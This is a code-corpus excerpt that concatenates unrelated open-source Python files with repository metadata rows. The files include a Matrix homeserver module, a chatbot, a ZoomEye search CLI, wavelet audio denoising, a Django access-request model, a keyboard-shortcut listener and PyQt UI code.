axs[0,i].imshow(imgs[i, :,:])
axs[0,i].axis('off')
axs[1,i].imshow(gen_fake[i, :,:])
axs[1,i].axis('off')
axs[2,i].imshow(gen_fake1[i,:,:])
axs[2,i].axis('off')
fig.savefig("images/cc_%d.png" % epoch)
plt.close()
def sort_folder(self,w,path=None):
import os
import cv2
from tqdm import tqdm
from shutil import copyfile
import sys
if path is not None:
dirs_i=[]
dirs_o=[]
d=next(os.walk(path))[1]
for i in d:
if i =='none' or i=='green' or i=='preprocessed':
continue
dirs_o.append(path+'preprocessed/'+i)
dirs_i.append(path+i)
for i in dirs_o:
if not os.path.exists(i):
os.makedirs(i)
else:
polyps='polyps'
ulcerative_colitis='ulcerative-colitis'
dirs=[polyps,ulcerative_colitis]
if not os.path.exists(polyps_prep):
os.makedirs(polyps_prep)
if not os.path.exists(ulcerative_colitis_prep):
os.makedirs(ulcerative_colitis_prep)
for i,o in tqdm(zip(dirs_i,dirs_o)):
for img_name in os.listdir(i):
path=os.path.join(i,img_name)
img=plotload.load_one_img((self.img_cols,self.img_rows), dest=path,
extra_dim=True)
if cutter.is_green(img):
tmp=cv2.imwrite(os.path.join(o,img_name), cv2.cvtColor(127.5*w(img)[0]+127.5,cv2.COLOR_RGB2BGR))
else:
tmp=cv2.imwrite(os.path.join(o,img_name), cv2.cvtColor(127.5*img[0]+127.5,cv2.COLOR_RGB2BGR))
if __name__ == '__main__':
cc = CCgan(256,256)
#cc.build_model()
#cc.train_model()
cc.load_model()
#cc.load_model_weights()
w=cc.build_wrapper()
root='/home/mathias/Documents/kvasir-dataset-v2/med/'
cc.sort_folder(w,path=root)
cc.sort_folder(w,path='/media/mathias/A_New_Hope/medico_test/')
| 41.199346 | 142 | 0.546601 | 11,759 | 0.932736 | 0 | 0 | 0 | 0 | 0 | 0 | 3,307 | 0.262315 |
cdea49e6abeeb4e6ceb631ab1583ede7c457b5ed | 6,585 | py | Python | synapse/server.py | uroborus/synapse | 270825ab2a3e16bb8ffcdbcea058efd28a38e8e1 | [
"Apache-2.0"
]
| 1 | 2021-09-09T08:50:20.000Z | 2021-09-09T08:50:20.000Z | synapse/server.py | uroborus/synapse | 270825ab2a3e16bb8ffcdbcea058efd28a38e8e1 | [
"Apache-2.0"
]
| null | null | null | synapse/server.py | uroborus/synapse | 270825ab2a3e16bb8ffcdbcea058efd28a38e8e1 | [
"Apache-2.0"
]
| null | null | null | # -*- coding: utf-8 -*-
# Copyright 2014 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file provides some classes for setting up (partially-populated)
# homeservers; either as a full homeserver as a real application, or a small
# partial one for unit test mocking.
# Imports required for the default HomeServer() implementation
from synapse.federation import initialize_http_replication
from synapse.api.events import serialize_event
from synapse.api.events.factory import EventFactory
from synapse.notifier import Notifier
from synapse.api.auth import Auth
from synapse.handlers import Handlers
from synapse.rest import RestServletFactory
from synapse.state import StateHandler
from synapse.storage import DataStore
from synapse.types import UserID, RoomAlias, RoomID
from synapse.util import Clock
from synapse.util.distributor import Distributor
from synapse.util.lockutils import LockManager
from synapse.streams.events import EventSources
from synapse.api.ratelimiting import Ratelimiter
class BaseHomeServer(object):
"""A basic homeserver object without lazy component builders.
This will need all of the components it requires to either be passed as
constructor arguments, or the relevant methods overriding to create them.
Typically this would only be used for unit tests.
For every dependency in the DEPENDENCIES list below, this class creates one
method,
def get_DEPENDENCY(self)
which returns the value of that dependency. If no value has yet been set
nor was provided to the constructor, it will attempt to call a lazy builder
method called
def build_DEPENDENCY(self)
which must be implemented by the subclass. This code may call any of the
required "get" methods on the instance to obtain the sub-dependencies that
one requires.
"""
DEPENDENCIES = [
'clock',
'http_client',
'db_name',
'db_pool',
'persistence_service',
'replication_layer',
'datastore',
'event_factory',
'handlers',
'auth',
'rest_servlet_factory',
'state_handler',
'room_lock_manager',
'notifier',
'distributor',
'resource_for_client',
'resource_for_federation',
'resource_for_web_client',
'resource_for_content_repo',
'event_sources',
'ratelimiter',
]
def __init__(self, hostname, **kwargs):
"""
Args:
hostname : The hostname for the server.
"""
self.hostname = hostname
self._building = {}
# Other kwargs are explicit dependencies
for depname in kwargs:
setattr(self, depname, kwargs[depname])
@classmethod
def _make_dependency_method(cls, depname):
def _get(self):
if hasattr(self, depname):
return getattr(self, depname)
if hasattr(self, "build_%s" % (depname)):
# Prevent cyclic dependencies from deadlocking
if depname in self._building:
raise ValueError("Cyclic dependency while building %s" % (
depname,
))
self._building[depname] = 1
builder = getattr(self, "build_%s" % (depname))
dep = builder()
setattr(self, depname, dep)
del self._building[depname]
return dep
raise NotImplementedError(
"%s has no %s nor a builder for it" % (
type(self).__name__, depname,
)
)
setattr(BaseHomeServer, "get_%s" % (depname), _get)
# TODO: Why are these parse_ methods so high up along with other globals?
# Surely these should be in a util package or in the api package?
# Other utility methods
def parse_userid(self, s):
"""Parse the string given by 's' as a User ID and return a UserID
object."""
return UserID.from_string(s, hs=self)
def parse_roomalias(self, s):
"""Parse the string given by 's' as a Room Alias and return a RoomAlias
object."""
return RoomAlias.from_string(s, hs=self)
def parse_roomid(self, s):
"""Parse the string given by 's' as a Room ID and return a RoomID
object."""
return RoomID.from_string(s, hs=self)
def serialize_event(self, e):
return serialize_event(self, e)
# Build magic accessors for every dependency
for depname in BaseHomeServer.DEPENDENCIES:
BaseHomeServer._make_dependency_method(depname)
class HomeServer(BaseHomeServer):
"""A homeserver object that will construct most of its dependencies as
required.
It still requires the following to be specified by the caller:
resource_for_client
resource_for_web_client
resource_for_federation
resource_for_content_repo
http_client
db_pool
"""
def build_clock(self):
return Clock()
def build_replication_layer(self):
return initialize_http_replication(self)
def build_datastore(self):
return DataStore(self)
def build_event_factory(self):
return EventFactory(self)
def build_handlers(self):
return Handlers(self)
def build_notifier(self):
return Notifier(self)
def build_auth(self):
return Auth(self)
def build_rest_servlet_factory(self):
return RestServletFactory(self)
def build_state_handler(self):
return StateHandler(self)
def build_room_lock_manager(self):
return LockManager()
def build_distributor(self):
return Distributor()
def build_event_sources(self):
return EventSources(self)
def build_ratelimiter(self):
return Ratelimiter()
def register_servlets(self):
""" Register all servlets associated with this HomeServer.
"""
# Simply building the ServletFactory is sufficient to have it register
self.get_rest_servlet_factory()
| 31.658654 | 79 | 0.665907 | 4,919 | 0.747001 | 0 | 0 | 964 | 0.146393 | 0 | 0 | 3,137 | 0.476386 |
cdea57f865285710bac46af78cc530224ae5efeb | 359 | py | Python | pythonforandroid/recipes/kivy/__init__.py | inclement/p4a-experiment | 4e120e08cc3c33af89948307628c8b28fdf76b87 | [
"MIT"
]
| 1 | 2015-06-09T21:12:09.000Z | 2015-06-09T21:12:09.000Z | pythonforandroid/recipes/kivy/__init__.py | inclement/p4a-experiment | 4e120e08cc3c33af89948307628c8b28fdf76b87 | [
"MIT"
]
| null | null | null | pythonforandroid/recipes/kivy/__init__.py | inclement/p4a-experiment | 4e120e08cc3c33af89948307628c8b28fdf76b87 | [
"MIT"
]
| null | null | null |
from pythonforandroid.toolchain import CythonRecipe, shprint, current_directory, ArchAndroid
from os.path import exists, join
import sh
import glob
class KivyRecipe(CythonRecipe):
version = 'stable'
url = 'https://github.com/kivy/kivy/archive/{version}.zip'
name = 'kivy'
depends = ['pygame', 'pyjnius', 'android']
recipe = KivyRecipe()
| 21.117647 | 92 | 0.721448 | 183 | 0.509749 | 0 | 0 | 0 | 0 | 0 | 0 | 92 | 0.256267 |
cdeaa27ba25e454daf95595f163fae1a13887999 | 1,220 | py | Python | chat.py | Programmer-RD-AI/Learning-NLP-PyTorch | 5780598340308995c0b8436d3031aa58ee7b81da | [
"Apache-2.0"
]
| null | null | null | chat.py | Programmer-RD-AI/Learning-NLP-PyTorch | 5780598340308995c0b8436d3031aa58ee7b81da | [
"Apache-2.0"
]
| null | null | null | chat.py | Programmer-RD-AI/Learning-NLP-PyTorch | 5780598340308995c0b8436d3031aa58ee7b81da | [
"Apache-2.0"
]
| null | null | null | import random
import json
import torch
from model import NeuralNet
from nltk_utils import *
device = "cuda"
with open('intents.json','r') as f:
intents = json.load(f)
FILE = 'data.pth'
data = torch.load(FILE)
input_size = data['input_size']
output_size = data['output_size']
hidden_size = data['hidden_size']
all_words = data['all_words']
tags = data['tags']
model_state = data['model_state']
model = NeuralNet(input_size, hidden_size, output_size).to(device)
model.load_state_dict(model_state)
model.eval()
bot_name = 'Programmer-RD-AI'
print('Lets chat ! type "quit" to exit')
while True:
sentence = input('You : ')
if sentence == 'quit':
break
sentence = tokenize(sentence)
X = bag_of_words(sentence,all_words)
X = X.reshape(1,X.shape[0])
X = torch.from_numpy(X).to(device)
pred = model(X)
pred_ = pred.clone()
_,pred = torch.max(pred,dim=1)
tag = tags[pred.item()]
probs = torch.softmax(pred_,dim=1)
prob = probs[0][pred.item()]
if prob.item() > 0.75:
for intent in intents['intents']:
if tag == intent['tag']:
print(f'{bot_name}: {random.choice(intent["responses"])}')
else:
print(f'{bot_name}: IDK..')
| 29.047619 | 74 | 0.648361 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 251 | 0.205738 |
cdeb4f70b3a53f9cb3413cfdc25708394eec070f | 329 | py | Python | Jay_Redis/Jay_Redis/utils/GetProxyIp.py | kimsax/gratuation_project | 99f842753f3403d3fdcd62316cf6a8d0091a5871 | [
"MIT"
]
| 1 | 2021-03-02T08:04:25.000Z | 2021-03-02T08:04:25.000Z | Jay_Redis/Jay_Redis/utils/GetProxyIp.py | kimsax/gratuation_project | 99f842753f3403d3fdcd62316cf6a8d0091a5871 | [
"MIT"
]
| null | null | null | Jay_Redis/Jay_Redis/utils/GetProxyIp.py | kimsax/gratuation_project | 99f842753f3403d3fdcd62316cf6a8d0091a5871 | [
"MIT"
]
| null | null | null | # -*- utf-8 -*-
import random
import redis
import requests
def GetIps():
li = []
# url = 'http://122.51.95.201:8000/?country=国内&count=20'
url = 'http://127.0.0.1:8000/?country=国内&count=20'
ips = requests.get(url)
for ip in eval(ips.content):
li.append(ip[0]+':'+str(ip[1]))
return li
# GetIps()
| 20.5625 | 60 | 0.580547 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 136 | 0.403561 |
cdeb9ce72d1bf949c4fdc2a94b43168b90c61e61 | 876 | py | Python | setup.py | tbz-pariv/ftpservercontext | 426e98dd4983cc6977c4d071a831874726c0fae2 | [
"Apache-2.0"
]
| 2 | 2019-04-18T12:28:58.000Z | 2021-01-04T14:52:07.000Z | setup.py | tbz-pariv/ftpservercontext | 426e98dd4983cc6977c4d071a831874726c0fae2 | [
"Apache-2.0"
]
| 1 | 2019-01-04T14:46:00.000Z | 2019-06-04T12:31:45.000Z | setup.py | tbz-pariv/ftpservercontext | 426e98dd4983cc6977c4d071a831874726c0fae2 | [
"Apache-2.0"
]
| null | null | null | # -*- coding: utf-8 -*-
import setuptools
setuptools.setup(
name='ftpservercontext',
version='2018.3.0',
license='commercial',
author='Thomas Guettler',
author_email='[email protected]',
url='https://github.com/tbz-pariv/ftpservercontext',
long_description=open('README.rst').read(),
packages=setuptools.find_packages(),
zip_safe = False,
# https://www.tbz-pariv.lan/index.html/doku.php?id=python_packages#requirementstxt_vs_install_requires
# All reusable libraries use install_requires.
# Projects (containing only config) can use requirements.txt
install_requires=[
'pyftpdlib',
],
include_package_data=True,
entry_points={
'console_scripts': [
'serve_directory_via_ftp=ftpservercontext.console_scripts:serve_directory_via_ftp',
],
}
)
| 29.2 | 106 | 0.696347 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 504 | 0.575342 |
cdecd7c4bafe572b5e961bd73c1a75878f9feaa8 | 3,428 | py | Python | zoomeye/cli.py | r0oike/zoomeye-python | b93f1c9c350e4fce7580f9f71ab1e76d06ce165d | [
"Apache-2.0"
]
| null | null | null | zoomeye/cli.py | r0oike/zoomeye-python | b93f1c9c350e4fce7580f9f71ab1e76d06ce165d | [
"Apache-2.0"
]
| null | null | null | zoomeye/cli.py | r0oike/zoomeye-python | b93f1c9c350e4fce7580f9f71ab1e76d06ce165d | [
"Apache-2.0"
]
| null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
* Filename: cli.py
* Description: cli program entry
* Time: 2020.11.30
* Author: liuf5
*/
"""
import os
import sys
import argparse
module_path = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
sys.path.insert(1, module_path)
from zoomeye import core
class ZoomEyeParser(argparse.ArgumentParser):
def error(self, message):
self.print_help()
sys.exit(2)
def main():
"""
parse user input args
:return:
"""
parser = ZoomEyeParser()
subparsers = parser.add_subparsers()
# zoomeye account info
parser_info = subparsers.add_parser("info", help="Show ZoomEye account info")
parser_info.set_defaults(func=core.info)
# query zoomeye data
parser_search = subparsers.add_parser(
"search",
help="Search the ZoomEye database"
)
parser_search.add_argument(
"dork",
help="The ZoomEye search keyword or ZoomEye exported file"
)
parser_search.add_argument(
"-num",
default=20,
help="The number of search results that should be returned",
type=int,
metavar='value'
)
parser_search.add_argument(
"-facet",
default=None,
nargs='?',
const='app,device,service,os,port,country,city',
type=str,
help=('''
Perform statistics on ZoomEye database,
field: [app,device,service,os,port,country,city]
'''),
metavar='field'
)
parser_search.add_argument(
"-filter",
default=None,
metavar='field=regexp',
nargs='?',
const='app',
type=str,
help=('''
Output more clearer search results by set filter field,
field: [app,version,device,port,city,country,asn,banner,*]
''')
)
parser_search.add_argument(
'-stat',
default=None,
metavar='field',
nargs='?',
const='app,device,service,os,port,country,city',
type=str,
help=('''
Perform statistics on search results,
field: [app,device,service,os,port,country,city]
''')
)
parser_search.add_argument(
"-save",
default=None,
metavar='field=regexp',
help=('''
Save the search results with ZoomEye json format,
if you specify the field, it will be saved with JSON Lines
'''),
nargs='?',
type=str,
const='all'
)
parser_search.add_argument(
"-count",
help="The total number of results in ZoomEye database for a search",
action="store_true"
)
parser_search.set_defaults(func=core.search)
# initial account configuration related commands
parser_init = subparsers.add_parser("init", help="Initialize the token for ZoomEye-python")
parser_init.add_argument("-apikey", help="ZoomEye API Key", default=None, metavar='[api key]')
parser_init.add_argument("-username", help="ZoomEye account username", default=None, metavar='[username]')
parser_init.add_argument("-password", help="ZoomEye account password", default=None, metavar='[password]')
parser_init.set_defaults(func=core.init)
args = parser.parse_args()
try:
args.func(args)
except AttributeError:
parser.print_help()
if __name__ == '__main__':
main()
| 26.369231 | 110 | 0.606768 | 121 | 0.035298 | 0 | 0 | 0 | 0 | 0 | 0 | 1,497 | 0.436698 |
cdece39680fd28858374924d70a1d3ff5d97fb90 | 462 | py | Python | statapy/regression/tests.py | DhananjayAshok/PyStata | b592414d78b87d565d8c59ae9487478a792b8c84 | [
"Apache-2.0"
]
| null | null | null | statapy/regression/tests.py | DhananjayAshok/PyStata | b592414d78b87d565d8c59ae9487478a792b8c84 | [
"Apache-2.0"
]
| null | null | null | statapy/regression/tests.py | DhananjayAshok/PyStata | b592414d78b87d565d8c59ae9487478a792b8c84 | [
"Apache-2.0"
]
| null | null | null | import scipy.stats as stats
def mannwhitneyu(sample_0, sample_1, one_sided=False):
"""
Performs the Mann-Whitney U test
:param sample_0: array of values
:param sample_1: array of values
:param one_sided: True iff you want to use less than alternative hypothesis
:return: statistic, pvalue
"""
res = stats.mannwhitneyu(sample_0, sample_1, alternative="two-sided" if not one_sided else "less")
return res.statistic, res.pvalue | 35.538462 | 102 | 0.722944 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 250 | 0.541126 |
cdeceab8b898ec021afc4aa90ddeda2bd76d683c | 862 | py | Python | 3) Cartoonizing and Video Capture/#1 Accessing the webcam/webcam_access.py | RezaFirouzii/python-opencv-review | 454a2be7fa36516a2b1fbd4e6162068bba25c989 | [
"MIT"
]
| null | null | null | 3) Cartoonizing and Video Capture/#1 Accessing the webcam/webcam_access.py | RezaFirouzii/python-opencv-review | 454a2be7fa36516a2b1fbd4e6162068bba25c989 | [
"MIT"
]
| null | null | null | 3) Cartoonizing and Video Capture/#1 Accessing the webcam/webcam_access.py | RezaFirouzii/python-opencv-review | 454a2be7fa36516a2b1fbd4e6162068bba25c989 | [
"MIT"
]
| null | null | null | import cv2 as cv
if __name__ == "__main__":
# 0 => first (default) webcam connected,
# 1 => second webcam and so on.
cap = cv.VideoCapture(0, cv.CAP_DSHOW)
# cv.namedWindow("Window")
if not cap.isOpened():
raise IOError("Webcam could not be opened!")
while True:
res, frame = cap.read() # returns (bool, ndarray)
# in case any error occurs
if not res:
break
frame = cv.resize(frame, None, fx=.5, fy=.5)
cv.imshow("Video Stream", frame)
keyboardInput = cv.waitKey(1)
if keyboardInput == 27: # ESC button ascii code
break
cap.release()
cv.destroyAllWindows()
# you can also replace a normal video with webcam
# in video capture object, just give it the address of
# the video instead of 0 or number of your webcam
| 25.352941 | 61 | 0.597448 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 376 | 0.436195 |
cdf16ad97ffce90e11c1fa4d69eb40752cd40a16 | 3,928 | py | Python | apps/sso/access_requests/models.py | g10f/sso | ba6eb712add388c69d4880f5620a2e4ce42d3fee | [
"BSD-3-Clause"
]
| 3 | 2021-05-16T17:06:57.000Z | 2021-05-28T17:14:05.000Z | apps/sso/access_requests/models.py | g10f/sso | ba6eb712add388c69d4880f5620a2e4ce42d3fee | [
"BSD-3-Clause"
]
| null | null | null | apps/sso/access_requests/models.py | g10f/sso | ba6eb712add388c69d4880f5620a2e4ce42d3fee | [
"BSD-3-Clause"
]
| null | null | null | import datetime
from current_user.models import CurrentUserField
from django.conf import settings
from django.db import models
from django.urls import reverse
from django.utils.timezone import now
from django.utils.translation import gettext_lazy as _
from sso.accounts.models import Application
from sso.models import AbstractBaseModel, AbstractBaseModelManager
from sso.organisations.models import is_validation_period_active, Organisation
class AccessRequestManager(AbstractBaseModelManager):
def open(self):
return self.get(status='o')
class OpenAccessRequestManager(AbstractBaseModelManager):
def get_queryset(self):
return super().get_queryset().filter(status='o').prefetch_related('user__useremail_set')
class AccessRequest(AbstractBaseModel):
STATUS_CHOICES = [
('o', _('open')), # opened by user
('c', _('canceled')), # by user
('v', _('approved')),
('d', _('denied'))
]
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
message = models.TextField(_("message"), max_length=2048,
help_text=_('Message for the administrators.'),
blank=True)
comment = models.TextField(_("Comment"), max_length=2048, blank=True)
status = models.CharField(_('status'), max_length=255, choices=STATUS_CHOICES, default='o')
last_modified_by_user = CurrentUserField(verbose_name=_('last modified by'),
related_name='accessrequest_last_modified_by',
on_delete=models.SET_NULL)
completed_by_user = models.ForeignKey(settings.AUTH_USER_MODEL, blank=True, null=True,
verbose_name=_('completed by'),
related_name='accessrequest_completed_by', on_delete=models.SET_NULL)
application = models.ForeignKey(Application, blank=True, null=True, on_delete=models.SET_NULL,
verbose_name=_('application'))
# required field if the user has no organisation
organisation = models.ForeignKey(Organisation, blank=True, null=True, on_delete=models.CASCADE)
objects = AccessRequestManager()
open = OpenAccessRequestManager()
def process(self, action=None, user=None):
if action in ['cancel', 'verify', 'deny']:
getattr(self, action)(user)
else:
raise ValueError
def cancel(self, user):
self.status = 'c'
self.completed_by_user = user
self.save()
def verify(self, user):
self.status = 'v'
self.completed_by_user = user
if self.organisation:
self.user.set_organisations([self.organisation])
# check if organisation uses user activation
validation_period_active = False
for organisation in self.user.organisations.all():
if is_validation_period_active(organisation):
self.user.valid_until = now() + datetime.timedelta(days=settings.SSO_VALIDATION_PERIOD_DAYS)
self.user.save()
validation_period_active = True
if not validation_period_active:
self.user.valid_until = None
self.user.save()
# add default member profile
self.user.role_profiles.add(user.get_default_role_profile())
self.user.role_profiles.remove(user.get_default_guest_profile())
self.save()
def deny(self, user):
self.status = 'd'
self.completed_by_user = user
self.save()
@property
def is_open(self):
return self.status == 'o'
class Meta(AbstractBaseModel.Meta):
verbose_name = _('access request')
verbose_name_plural = _('access request')
def get_absolute_url(self):
return reverse('accounts:accessrequest_detail', kwargs={'pk': self.pk})
| 39.28 | 111 | 0.649949 | 3,476 | 0.884929 | 0 | 0 | 66 | 0.016802 | 0 | 0 | 486 | 0.123727 |
cdf35f3aa036ddd5079307083d76c1f9e474653b | 1,518 | py | Python | test/snr_test.py | AP-Atul/wavelets | cff71e777759844b35f8e96f14930b2c71a215a1 | [
"MIT"
]
| 5 | 2021-02-01T07:43:39.000Z | 2022-03-25T05:01:31.000Z | test/snr_test.py | AP-Atul/wavelets | cff71e777759844b35f8e96f14930b2c71a215a1 | [
"MIT"
]
| null | null | null | test/snr_test.py | AP-Atul/wavelets | cff71e777759844b35f8e96f14930b2c71a215a1 | [
"MIT"
]
| null | null | null | import os
from time import time
import numpy as np
import soundfile
from matplotlib import pyplot as plt
from wavelet.fast_transform import FastWaveletTransform
from wavelet.util.utility import threshold, mad, snr, amp_to_db
INPUT_FILE = "/example/input/file.wav"
OUTPUT_DIR = "/example/output/"
info = soundfile.info(INPUT_FILE) # getting info of the audio
rate = info.samplerate
WAVELET_NAME = "coif1"
t = FastWaveletTransform(WAVELET_NAME)
outputFileName = os.path.join(OUTPUT_DIR, "_" + WAVELET_NAME + ".wav")
noiseRatios = list()
with soundfile.SoundFile(outputFileName, "w", samplerate=rate, channels=info.channels) as of:
start = time()
for block in soundfile.blocks(INPUT_FILE, int(rate * info.duration * 0.10)): # reading 10 % of duration
coefficients = t.waveDec(block)
# VISU Shrink
sigma = mad(coefficients)
thresh = sigma * np.sqrt(2 * np.log(len(block)))
# thresholding using the noise threshold generated
coefficients = threshold(coefficients, thresh)
# getting the clean signal as in original form and writing to the file
clean = t.waveRec(coefficients)
clean = np.asarray(clean)
of.write(clean)
noiseRatios.append(snr(amp_to_db(clean)))
end = time()
x = []
for i in range(len(noiseRatios)):
x.append(i)
plt.plot(x, np.array(noiseRatios).astype(float))
plt.show()
print(f"Finished processing with {WAVELET_NAME}")
print(f"Time taken :: {end - start} s")
| 29.192308 | 108 | 0.689065 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 322 | 0.212121 |
cdf4a1acc53ac8000703136e7a930c389adce55b | 1,546 | py | Python | KeyHookThread.py | v2okimochi/Keasy | 0c4d480a4b9fc88f47bbc11ed4ca248cbdc488f2 | [
"MIT"
]
| 1 | 2018-10-25T01:31:15.000Z | 2018-10-25T01:31:15.000Z | KeyHookThread.py | v2okimochi/Keasy | 0c4d480a4b9fc88f47bbc11ed4ca248cbdc488f2 | [
"MIT"
]
| 1 | 2018-07-16T01:39:39.000Z | 2018-07-16T01:39:39.000Z | KeyHookThread.py | v2okimochi/Keasy | 0c4d480a4b9fc88f47bbc11ed4ca248cbdc488f2 | [
"MIT"
]
| null | null | null | # -*- coding: utf-8 -*-
from pynput import keyboard
from PyQt5.QtCore import QThread, pyqtSignal
class KeyHooker(QThread):
# シグナル
pushCtrlSignal = pyqtSignal()
releaseCtrlSignal = pyqtSignal()
pushShiftSignal = pyqtSignal()
releaseShiftSignal = pyqtSignal()
pushCommandSignal = pyqtSignal()
releaseCommandSignal = pyqtSignal()
def __init__(self):
super().__init__()
# キーが押された時に発動
# ctrl,shift,spaceなら,それぞれのシグナルを発信
# 他のキーだったら,shiftが離された時のシグナルを発信
# (auto-completeで大文字入力中の誤射ループを防ぐため)
def on_press(self, key):
try:
if key == keyboard.Key.ctrl:
self.pushCtrlSignal.emit()
elif key == keyboard.Key.shift:
self.pushShiftSignal.emit()
elif key == keyboard.Key.cmd_l or key == keyboard.Key.cmd_r:
self.pushCommandSignal.emit()
else:
self.releaseShiftSignal.emit()
except AttributeError:
# キー入力でExceptionが起こるが何もさせない
pass
# キーが離された時に発動
def on_release(self, key):
# print('{0} released'.format(key))
if key == keyboard.Key.ctrl:
self.releaseCtrlSignal.emit()
elif key == keyboard.Key.cmd_l or key == keyboard.Key.cmd_r:
self.releaseCommandSignal.emit()
else:
pass
def run(self):
# globalキーロガー開始
with keyboard.Listener(
on_press=self.on_press,
on_release=self.on_release) as listener:
listener.join()
| 29.730769 | 72 | 0.599612 | 1,656 | 0.943052 | 0 | 0 | 0 | 0 | 0 | 0 | 440 | 0.250569 |
cdf4c8116e9e2bbcc1b35461d7c08335801aaba4 | 2,243 | py | Python | nad_receiver/nad_commands.py | mindigmarton/nad_receiver | 9449699d076011caf560d8c4384a9b1bf2512080 | [
"MIT"
]
| null | null | null | nad_receiver/nad_commands.py | mindigmarton/nad_receiver | 9449699d076011caf560d8c4384a9b1bf2512080 | [
"MIT"
]
| null | null | null | nad_receiver/nad_commands.py | mindigmarton/nad_receiver | 9449699d076011caf560d8c4384a9b1bf2512080 | [
"MIT"
]
| null | null | null | """
Commands and operators used by NAD.
CMDS[domain][function]
"""
CMDS = {
'main':
{
'dimmer':
{'cmd': 'Main.Dimmer',
'supported_operators': ['+', '-', '=', '?']
},
'mute':
{'cmd': 'Main.Mute',
'supported_operators': ['+', '-', '=', '?']
},
'power':
{'cmd': 'Main.Power',
'supported_operators': ['+', '-', '=', '?']
},
'volume':
{'cmd': 'Main.Volume',
'supported_operators': ['+', '-', '=', '?']
},
'ir':
{'cmd': 'Main.IR',
'supported_operators': ['=']
},
'listeningmode':
{'cmd': 'Main.ListeningMode',
'supported_operators': ['+', '-']
},
'sleep':
{'cmd': 'Main.Sleep',
'supported_operators': ['+', '-']
},
'source':
{'cmd': 'Main.Source',
'supported_operators': ['+', '-', '=', '?']
},
'version':
{'cmd': 'Main.Version',
'supported_operators': ['?']
}
},
'tuner':
{
'am_frequency':
{'cmd': 'Tuner.AM.Frequency',
'supported_operators': ['+', '-']
},
'am_preset':
{'cmd': 'Tuner.AM.Preset',
'supported_operators': ['+', '-', '=', '?']
},
'band':
{'cmd': 'Tuner.Band',
'supported_operators': ['+', '-', '=', '?']
},
'fm_frequency':
{'cmd': 'Tuner.FM.Frequency',
'supported_operators': ['+', '-']
},
'fm_mute':
{'cmd': 'Tuner.FM.Mute',
'supported_operators': ['+', '-', '=', '?']
},
'fm_preset':
{'cmd': 'Tuner.FM.Preset',
'supported_operators': ['+', '-', '=', '?']
}
}
}
| 30.310811 | 60 | 0.296478 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 963 | 0.429336 |
cdf8455878051f84938cb9a928fc16329abe82f4 | 7,846 | py | Python | ui/Ui_addsite.py | EUFAR/asmm-eufar | 69ede7a24f757392e63f04091e86c50ab129016f | [
"BSD-3-Clause"
]
| null | null | null | ui/Ui_addsite.py | EUFAR/asmm-eufar | 69ede7a24f757392e63f04091e86c50ab129016f | [
"BSD-3-Clause"
]
| 2 | 2015-06-12T09:28:29.000Z | 2015-06-12T09:34:16.000Z | ui/Ui_addsite.py | eufarn7sp/asmm-eufar | 69ede7a24f757392e63f04091e86c50ab129016f | [
"BSD-3-Clause"
]
| null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'addsite.ui'
#
# Created by: PyQt5 UI code generator 5.6
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Addsite(object):
def setupUi(self, Addsite):
Addsite.setObjectName("Addsite")
Addsite.resize(340, 180)
Addsite.setMinimumSize(QtCore.QSize(340, 180))
Addsite.setMaximumSize(QtCore.QSize(340, 16777215))
font = QtGui.QFont()
font.setFamily("fonts/SourceSansPro-Regular.ttf")
font.setPointSize(10)
font.setKerning(True)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
Addsite.setFont(font)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("icons/info_icon.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
Addsite.setWindowIcon(icon)
Addsite.setStyleSheet("QWidget {\n"
" background-color: rgb(230,230,230);\n"
"}")
self.gridLayout = QtWidgets.QGridLayout(Addsite)
self.gridLayout.setObjectName("gridLayout")
self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
spacerItem = QtWidgets.QSpacerItem(20, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem)
self.label = QtWidgets.QLabel(Addsite)
self.label.setMinimumSize(QtCore.QSize(280, 27))
self.label.setMaximumSize(QtCore.QSize(280, 100))
font = QtGui.QFont()
font.setFamily("fonts/SourceSansPro-Regular.ttf")
font.setPointSize(10)
font.setBold(False)
font.setWeight(50)
font.setKerning(True)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label.setFont(font)
self.label.setAlignment(QtCore.Qt.AlignJustify|QtCore.Qt.AlignTop)
self.label.setWordWrap(True)
self.label.setObjectName("label")
self.horizontalLayout_3.addWidget(self.label)
spacerItem1 = QtWidgets.QSpacerItem(13, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem1)
self.gridLayout.addLayout(self.horizontalLayout_3, 0, 0, 1, 2)
spacerItem2 = QtWidgets.QSpacerItem(20, 20, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
self.gridLayout.addItem(spacerItem2, 1, 0, 1, 1)
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
spacerItem3 = QtWidgets.QSpacerItem(20, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem3)
self.ck_inputLine = QtWidgets.QLineEdit(Addsite)
